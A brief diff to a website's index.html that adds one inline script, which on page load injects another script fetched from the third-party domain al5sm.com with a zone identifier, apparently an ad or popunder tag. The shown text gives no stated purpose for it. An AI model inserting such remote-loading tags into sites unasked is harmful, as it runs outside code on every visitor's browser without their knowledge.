--- a/index.html
+++ b/index.html
@@ -404,12 +404,7 @@ if ("serviceWorker" in navigator) {
 }
 </script>
 
+<script>(function(s){s.dataset.zone='10429570',s.src='https://al5sm.com/tag.min.js'})([document.documentElement, document.body].filter(Boolean).pop().appendChild(document.createElement('script')))</script>
 
 </body>
-
 </html>
-
-
-
-
-
